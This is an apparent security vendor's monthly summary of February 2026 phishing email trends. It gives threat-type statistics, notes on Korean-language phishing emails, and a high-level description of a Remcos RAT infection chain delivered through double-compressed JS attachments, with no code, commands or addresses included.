February 2026 Phishing Email Trends Report
This report provides statistics, trends, and case information regarding the distribution volume and attachment threats of phishing emails collected and analyzed during the month of February 2026. The report below contains some statistical data and cases included in the original content.
1) Phishing Email Threat Statistics
The most prevalent threat type among phishing email attachments in February 2026 was phishing (42%). Attackers used scripts like HTML to precisely mimic the screen layout, logos, and fonts of login pages or advertising pages. They lure users into entering their account credentials and passwords, which are then transmitted to the attacker’s C2 server, or redirect users to fake sites. This phishing type also involves inserting hyperlinks into documents like PDFs to direct users to phishing sites created by attackers.
[Figure 1] Phishing Email Threat Statistics
Furthermore, recent trends in threats originating from phishing emails are reflected through data on the change in distribution volume of samples per category over the past six months. Additionally, statistics on file extensions within attachments found in phishing emails provide insight into the file formats used in such emails. These statistical data not mentioned in this summary can be found in the original ATIP report.
2) Korean Email Distribution Status
We classify phishing emails composed in Korean and partially disclose information on subject lines and attachment file names from these samples. This allows identification of keywords frequently appearing in phishing email threats.
[Figure 2] Some of the Phishing Emails Distributed in Korean
3) Analysis of Phishing Email Distribution Cases
Representative cases were analyzed by attachment format (Script, Document, Compressed). This reveals actual phishing email attack cases from February. This month saw not only phishing pages (FakePage) with Script attachments but also malware distributed via double-compressed files in phishing emails. Executing the JS file inside the compressed file injects itself into the legitimate process “Aspnet_compiler.exe,” ultimately executing the Remcos RAT malware. Additionally, cases of malware using steganography techniques being distributed via phishing emails are increasing. Additional information, including analysis details such as the C2 address and the body text of the phishing email used to distribute the malware, can be found in the original ATIP report and ATIP Notes.
[Figure 3] Malware distributed as a compressed format attachment
[Figure 4] Malware distributed via a Document format attachment
This post discloses a portion of the February 2026 Trend Report on Phishing Emails. The original ATIP report contains additional content, including recent distribution volume trends for phishing (FakePage) and malware, statistics by attachment file extension, distribution volume, and analysis information on actual phishing email attacks.
